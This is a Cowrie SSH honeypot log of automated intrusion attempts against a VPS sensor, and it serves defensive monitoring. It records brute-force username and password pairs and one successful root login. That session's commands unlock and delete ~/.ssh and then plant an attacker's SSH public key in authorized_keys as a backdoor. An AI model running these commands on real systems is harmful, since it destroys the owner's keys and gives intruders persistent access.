03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:08:17.342555Z","src_ip":"134.199.225.42","session":"9b1ab96bcabf"}
{"eventid":"cowrie.login.failed","username":"radmin","password":"radmin123","message":"login attempt [radmin/radmin123] failed","sensor":"my-vps","timestamp":"2025-08-26T06:08:18.012009Z","src_ip":"134.199.225.42","session":"9b1ab96bcabf"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:08:19.171433Z","src_ip":"134.199.225.42","session":"9b1ab96bcabf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11142,"dst_ip":"1.2.3.4","dst_port":22,"session":"da3b8ce01e78","protocol":"ssh","message":"New connection: 212.227.235.229:11142 (1.2.3.4:22) [session: da3b8ce01e78]","sensor":"my-vps","timestamp":"2025-08-26T06:09:02.786079Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:03.122343Z","src_ip":"212.227.235.229","session":"da3b8ce01e78"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:03.123110Z","src_ip":"212.227.235.229","session":"da3b8ce01e78"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:04.225873Z","src_ip":"212.227.235.229","session":"da3b8ce01e78"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11158,"dst_ip":"1.2.3.4","dst_port":22,"session":"2c3489f76abf","protocol":"ssh","message":"New connection: 212.227.235.229:11158 (1.2.3.4:22) [session: 2c3489f76abf]","sensor":"my-vps","timestamp":"2025-08-26T06:09:04.477345Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:04.831722Z","src_ip":"212.227.235.229","session":"2c3489f76abf"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:04.832631Z","src_ip":"212.227.235.229","session":"2c3489f76abf"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:05.975626Z","src_ip":"212.227.235.229","session":"2c3489f76abf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":11170,"dst_ip":"1.2.3.4","dst_port":22,"session":"f207fcf20186","protocol":"ssh","message":"New connection: 212.227.235.229:11170 (1.2.3.4:22) [session: f207fcf20186]","sensor":"my-vps","timestamp":"2025-08-26T06:09:06.196311Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:06.521296Z","src_ip":"212.227.235.229","session":"f207fcf20186"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:06.522103Z","src_ip":"212.227.235.229","session":"f207fcf20186"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.118","src_port":62242,"dst_ip":"1.2.3.4","dst_port":22,"session":"b9aa9a786617","protocol":"ssh","message":"New connection: 192.155.90.118:62242 (1.2.3.4:22) [session: b9aa9a786617]","sensor":"my-vps","timestamp":"2025-08-26T06:09:06.706382Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:06.923465Z","src_ip":"192.155.90.118","session":"b9aa9a786617"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:06.924222Z","src_ip":"192.155.90.118","session":"b9aa9a786617"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:07.526868Z","src_ip":"192.155.90.118","session":"b9aa9a786617"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.118","src_port":62258,"dst_ip":"1.2.3.4","dst_port":22,"session":"9af3a0361972","protocol":"ssh","message":"New connection: 192.155.90.118:62258 (1.2.3.4:22) [session: 9af3a0361972]","sensor":"my-vps","timestamp":"2025-08-26T06:09:07.646017Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:07.784761Z","src_ip":"192.155.90.118","session":"9af3a0361972"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:07.785429Z","src_ip":"192.155.90.118","session":"9af3a0361972"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:07.888933Z","src_ip":"212.227.235.229","session":"f207fcf20186"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:08.441417Z","src_ip":"192.155.90.118","session":"9af3a0361972"}
{"eventid":"cowrie.session.connect","src_ip":"192.155.90.118","src_port":62264,"dst_ip":"1.2.3.4","dst_port":22,"session":"8915f6e6c1e1","protocol":"ssh","message":"New connection: 192.155.90.118:62264 (1.2.3.4:22) [session: 8915f6e6c1e1]","sensor":"my-vps","timestamp":"2025-08-26T06:09:08.537037Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:08.706423Z","src_ip":"192.155.90.118","session":"8915f6e6c1e1"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:08.707222Z","src_ip":"192.155.90.118","session":"8915f6e6c1e1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56592,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1d85ce57c7f","protocol":"ssh","message":"New connection: 212.227.125.160:56592 (1.2.3.4:22) [session: c1d85ce57c7f]","sensor":"my-vps","timestamp":"2025-08-26T06:09:09.139803Z"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:09.297191Z","src_ip":"192.155.90.118","session":"8915f6e6c1e1"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:09.392608Z","src_ip":"212.227.125.160","session":"c1d85ce57c7f"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:09.394968Z","src_ip":"212.227.125.160","session":"c1d85ce57c7f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:09.938843Z","src_ip":"212.227.125.160","session":"c1d85ce57c7f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":56600,"dst_ip":"1.2.3.4","dst_port":22,"session":"07e951c1782f","protocol":"ssh","message":"New connection: 212.227.125.160:56600 (1.2.3.4:22) [session: 07e951c1782f]","sensor":"my-vps","timestamp":"2025-08-26T06:09:10.045522Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:10.267462Z","src_ip":"212.227.125.160","session":"07e951c1782f"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:10.268459Z","src_ip":"212.227.125.160","session":"07e951c1782f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:10.827425Z","src_ip":"212.227.125.160","session":"07e951c1782f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50000,"dst_ip":"1.2.3.4","dst_port":22,"session":"abfe36bc39a2","protocol":"ssh","message":"New connection: 212.227.125.160:50000 (1.2.3.4:22) [session: abfe36bc39a2]","sensor":"my-vps","timestamp":"2025-08-26T06:09:10.938153Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:09:11.177084Z","src_ip":"212.227.125.160","session":"abfe36bc39a2"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T06:09:11.178612Z","src_ip":"212.227.125.160","session":"abfe36bc39a2"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:11.730828Z","src_ip":"212.227.125.160","session":"abfe36bc39a2"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":47308,"dst_ip":"1.2.3.4","dst_port":22,"session":"7feeae6a3c16","protocol":"ssh","message":"New connection: 134.199.225.42:47308 (1.2.3.4:22) [session: 7feeae6a3c16]","sensor":"my-vps","timestamp":"2025-08-26T06:09:20.218121Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:09:20.219191Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:09:20.376884Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.login.success","username":"root","password":"123123aA@","message":"login attempt [root/123123aA@] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:09:21.048529Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:09:21.426059Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:09:21.426833Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:09:21.428255Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:21.588381Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:09:21.921366Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:09:21.922083Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:09:22.081522Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:09:22.082776Z","src_ip":"134.199.225.42","session":"7feeae6a3c16"}
{"eventid":"cowrie.session.connect","src_ip":"134.199.225.42","src_port":47316,"dst_ip":"1.2.3.4","dst_port":22,"session":"d04085d55d75","protocol":"ssh","message":"New connection: 134.199.225.42:47316 (1.2.3.4:22) [session: d04085d55d75]","sensor":"my-vps","timestamp":"2025-08-26T06:09:22.241396Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:09:22.242346Z","src_ip":"134.199.225.42","session":"d04085d55d75"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:09:22.401130Z","src_ip":"134.199.225.42","session":"d04085d55d75"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:09:23.079123Z","src_ip":"134.199.225.42","session":"d04085d55d75"}
